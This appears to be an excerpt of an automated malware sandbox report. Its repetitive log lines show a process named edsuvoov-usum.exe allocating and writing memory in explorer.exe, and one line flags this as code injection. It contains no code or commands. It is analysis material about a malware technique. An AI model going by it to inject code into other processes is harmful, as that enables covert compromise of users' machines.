Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10AF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10B90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10BF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 10C80000 protect: page read and writeJump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8540000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8040000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8510000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 86E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9020000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9030000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: A520000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: ADC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B0B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B0E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B5C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B5D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B680000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B660000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B670000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B690000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B6A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: B6B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C6E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C6F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E410000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E420000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 7790000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8360000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8400000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8410000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8420000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8EA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8EB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8EC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8EF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8ED0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8EE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9040000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BAC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BAD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BB00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BAE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BAF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: EF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BB20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: F60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BB10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BB30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E430000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E440000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E450000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E460000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E470000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E480000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E490000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E4A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E4B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E690000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E4E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E680000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E6F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E700000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E710000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E720000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E730000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E740000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E750000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E760000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E770000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E780000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E790000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E7A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E7B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8340000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 7FE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 86D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 86F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8300000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8F90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 8FF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9000000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9010000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9270000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9280000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9290000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 92F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9300000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9310000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9320000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9330000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9350000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9360000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9450000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9460000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9470000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9480000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9490000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 94A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 94B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 94E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 94F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 94D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9500000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9510000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9520000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9530000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9540000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BBC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BBD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BBE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BBF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BC90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BCA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BCB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BCC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BE00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BE10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BD70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BD80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BD90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BE20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BE30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C8C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C8D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BD50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BD60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: BDC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C8E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C8F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C900000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C910000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C920000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C930000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C940000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C950000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C960000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C970000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C980000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C990000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C9A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: C9B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E4C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E4D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E840000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E850000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E860000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E870000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E880000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E890000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E8F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E900000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E910000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E920000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E930000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E940000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E950000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E960000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E970000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E980000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E990000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 83F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 9340000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: E9F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: EA00000 value: 43Jump to behavior
